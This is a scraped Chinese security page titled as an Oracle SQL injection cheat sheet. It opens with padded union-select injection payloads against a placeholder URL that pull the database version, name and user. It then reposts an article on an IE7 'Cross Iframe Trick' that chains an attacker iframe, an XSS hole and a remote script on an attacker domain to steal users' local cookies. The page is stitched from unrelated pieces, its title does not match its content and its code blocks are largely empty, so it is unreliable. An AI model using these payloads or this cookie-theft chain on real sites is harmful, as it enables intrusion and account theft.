AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6–+-

www.xxx.com/index.php?content=more_product&id=-17 and (select 1)=(select

0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u

ser()),3,4,5,6–+-

★ 数据库防脚本注入WEB安全

★ 注入笔记判断数据库脚本安全

★ 外国的注入技巧收集脚本安全

★ 客户端无脚本攻击(Scriptless Attacks)脚本安全

★ 白帽子讲web安全?C浏览器安全脚本安全

★ web安全学习之xss个人总结

★ ADSL用户注意了 防 攻击几大秒法WEB安全

★ 检测隐藏进程WEB安全

★ 网站脚本注入检测如何绕过限制

Oracle SQL Injection Cheat Sheet脚本安全 篇10

虽然也讲到用一个外域做xss proxy,但那文章里的条件限制太多,且建立在ie6的基础上,所以实现起来不靠谱,仅仅存在理论可能

经测试,大风的这篇文章是可行的,方法也确实比较绕比较猥琐,

原文如下:

今天这篇主要是要讲以下这么几件事情:

1. iframe的限制

2. 突破iframe获取本地cookie的思路

3. 利用Cross Iframe. Trick突破iframe安全限制

我的测试环境是: IE 7 (7.0.5730.13)

以下所有的内容全部经过我在IE7中测试,是真实有效的结果。

Iframe的限制:

因为iframe这个玩意比较特殊,所以浏览器对它一般都有一些限制。

首先父窗口不能控制子窗口的js,只能读取一些对象;子窗口也不能使用父窗口的js,也只能读部分对象,更多的比如document啥的都限制了。

关系如下:

- iframe’s should not be able to view content/cookies from another domain- iframe. children CAN view certain properties and execute certain behaviors - parent.window.blur - parent.window.opener - parent.window.length - others- iframe. children CAN redirect the parent frame. to a new location (great for phishing)- parent.location.href- parent.window.location

对于有些利用子窗口执行父窗口js的方法是限制的

比如,在子窗口里可以这么使用:

parent.location.href=“www.sohu.com”;

上面的语句将把父窗口重新定义到sohu的网站去.

但是如果想执行js,或者是读取document对象,则会被拒绝访问

parent.location.href=new String(“javascript.:alert(document.cookie)”);

parent.location.href=new String(“javascript.:alert(1)”);

像这两条都会被拒绝。

对于iframe,Firefox3 居然是不限制本地cookie发送的!也就是说,在Firefox环境里,使用iframe包含一个远程页面,是会将保存在本地的cookie发送出去的,这使得csrf会非常之方便。

但是IE不同,对于IE环境中,img和iframe标签都只能发送session cookie,无法发送本地cookie,所以很多时候CSRF会失败,这也会给XSS带来很大的麻烦,比如会使得XSRF更困难一些。

鉴于Firefox一点挑战都没有,所以今天主要研究的对象是IE。

在IE环境下,程序员们一般都是使用P3P协议来获取跨域cookie的,但是P3P也要求我们改写HTTP头,更麻烦,在这里,我纯粹使用一些脚本的技巧来突破这些限制。ps:由于这篇文章也不新,所以这里讲的是ie7的情形,ie8 p3p也不行了

突破IFRAME限制的思路:(以下都是在IE环境中)

由于页面里的iframe都是发送的session cookie,所以子框架页面里本身是只有一个session cookie的,我们无法通过在子框架里执行js的方法来获取本地cookie,无中生有的事情是干不出来的。

了解这一原理后,思路就很明确了:想办法新起一个不受限制的窗口,从而获取本地cookie。

具体来说,有这么两个办法:

1、使用window.open打开一个新窗口

2、回到父窗口,让其打开一个新窗口

在子框架中,使用window.open确实可以发送本地cookie,但是问题是浏览器一般会限制页面弹窗口,会被拦截,所以这个方法比较~~,不是个好办法。 汗...

而第二个办法,回到父窗口去打开新窗口,就涉及到一个突破iframe执行脚本的问题,而这个问题在我的前一篇Cross Iframe. Trick 里已经解决了,所以我们的方法就呼之欲出了。

利用Cross Iframe. Trick突破iframe限制获取子框架cookie:

Cross Iframe的最大贡献就在于他可以绕过前面提到的iframe的限制,在父域或者子框架里获取对象,执行脚本。

当一个页面很难突破时,如果他包含了一个存在弱点的iframe页面,则可能会带来灾难性的结果。

我相信真正精通脚本攻击的人是能够看到它的用处和优势的。

环境如下:(绑定127.0.0.1 www.baidu.com)

www.a.com/1.html是我们要攻击的页面,它包含了一个存在弱点的iframe,用户只会去浏览这个页面

www.baidu.com/3.html 是我们已经控制的页面,他作为一个iframe被1.html所包含。在这里是iframe. proxy

www.a.com/4.html 是www.a.com上的一个存在XSS漏洞的页面,一般情况下用户不会去访问它!

www.b.com/4.js 这是攻击者自己的服务器上的一个恶意脚本,将被XSS攻击远程载入4.html中。

由于用户只会浏览www.a.com/1.html,所以我们要通过脚本攻击,从www.a.com/1.html里获取用户在www.baidu.com/3.html的本地cookie。

www.a.com/1.html的代码如下:

---------------------------------- 我是聪明的分割线 -------------------------------------------

---------------------------------- 我是聪明的分割线 -------------------------------------------

它包含了一个iframe页面

www.baidu.com/3.html 的代码为:

---------------------------------- 我是聪明的分割线 -------------------------------------------

---------------------------------- 我是聪明的分割线 -------------------------------------------

3.html是我们的iframe. proxy,利用它来完成在www.a.com里执行脚本的工作,

www.a.com/4.html 的代码为:

---------------------------------- 我是聪明的分割线 -------------------------------------------

This is 4.html!

---------------------------------- 我是聪明的分割线 -------------------------------------------

www.b.com/4.js 的代码为:

---------------------------------- 我是聪明的分割线 -------------------------------------------

alert(“4.js is loaded!”);

top.tt1(’’>www.baidu.com/3.html----动态iframe--->www.a.com/4.html的XSS漏洞 ------>在www.a.com域中远程加载www.b.com/4.js

4.js动态调用www.a.com/1.html里的 tt1() 函数,并篡改参数,写入一个form,利用js动态提交该表单,这时候提交的表单,就自动带上了本地cookie了

这里的思路非常霸气~

整个过程运行结果如下:

首先访问 www.a.com/1.html[attach=125]

可以看到这个时候在www.baidu.com/3.html 中弹出的是session cookie,可以对比下我们最后结果里弹出的本地cookie接下来,3.html将构造iframe. proxy[attach=126]

可以看到,由于www.a.com/4.html里的XSS漏洞被利用,所以远程js被加载了[attach=127]

远程js继续调用top1.tt1(); 这个函数,同时篡改它的参数,参数如上图显示。接下来将把这个参数注入到tt1()函数中,由于tt1()函数中存在一个 document.write,所以它将改写页面,并且构造一个form表单,重新提交到www.baidu.com/2.html[attach=128]

由于在form表单中,利用了img标签的onload事件,使得img一加载就提交form,所以很快就自动获得了cookie。

可以看到,此时获取的,就是www.baidu.com/2.html 保存的本地cookie!

需要注意的是,在4.html中,即使把 top.tt1()改成了 document.write(),也无法获取本地cookie,想来应该还是因为iframe限制的问题。

以上,就是利用Cross Iframe. Trick的技巧来突破iframe限制的方法,其意义在于跨页面攻击、跨域攻击、突破iframe的限制,等等,大大丰富了脚本攻击的方法。

不知道我这篇是不是又在白写,如果有人能把我给出的POC好好调一遍,会发现这里面还是很有趣的。

最后,再讲讲,有的人可能会提出疑问,能构造iframe. proxy,是否可以直接用来挂马?

【Oracle SQL Injection Cheat Sheet脚本安全】推荐阅读:

MIS系统实例中Oracle数据库的安全策略07-23

上一篇:高考历史命题趋势下一篇:成本管理会计学习报告

热搜文章

    相关推荐